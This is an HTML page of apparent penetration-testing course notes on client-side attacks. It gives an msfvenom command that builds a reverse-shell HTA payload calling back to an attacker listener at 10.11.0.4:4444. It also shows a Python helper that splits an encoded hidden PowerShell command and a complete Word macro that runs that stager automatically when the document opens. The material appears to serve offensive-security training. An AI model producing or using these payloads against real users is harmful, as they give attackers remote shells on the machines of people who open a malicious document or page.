<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>13 Client Side Attacks [2020]</title>
</head><body><b><span style="font-size: 11pt">Remote Client fingerprinting: </span></b>Fingerprintjs2 JavaScript library &nbsp;<br/>
<br/>
<b><span style="font-size: 11pt"><br/>
<br/>
<br/>
Basic HTA Template:<br/>
</span><span style="font-size: 11pt">------------------------------------</span><span style="font-size: 12pt"><br/>
</span></b>sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta &nbsp;<br/>
<br/>
<b><span style="font-size: 12pt"><br/>
<br/>
</span></b><b><span style="font-size: 12pt">&gt;</span></b>&nbsp;Microsoft Publisher is not supporting <b>PROTECTED VIEW</b>&nbsp;mode.<br/>
&nbsp; &nbsp;[Protected view mode is a mode activated in all Office Products that starts when the document transfered over EMAIL/URL.<br/>
<br/>
<br/>
<span style="font-size: 11pt"><b>Microsoft Office Macros:<br/>
</b></span><span style="font-size: 11pt"><b>-----------------------------------</b></span><br/>
We will use a simple Python script to split our command: &nbsp; <br/>
<br/>
str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....." &nbsp; <br/>
<br/>
n = 50 <br/>
for i in range(0, len(str), n): <ul><li style="list-style-type: none">print "Str = Str + " + '"' + str[i:i+n] + '"' &nbsp;</li>
<li style="list-style-type: none"></li>
</ul>
<br/>
<span style="font-size: 11pt"><br/>
<b>Final Macros Code:<br/>
</b></span><span style="font-size: 11pt"><b>--------------------------------</b></span><br/>
Sub AutoOpen() <br/>
MyMacro <br/>
End Sub <br/>
<br/>
Sub Document_Open() <br/>
MyMacro <br/>
End Sub <br/>
<br/>
Sub MyMacro() <br/>
Dim Str As String <br/>
Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ" <br/>
Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB" <br/>
Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A" <br/>
Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg" <br/>
Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY" <br/>
Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB" <br/>
... <br/>
Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac" <br/>
Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB" <br/>
Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA" <br/>
Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA" <br/>
Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK" <br/>
Str = Str + "QA=" <br/>
CreateObject("Wscript.Shell").Run Str End Sub &nbsp;</body></html>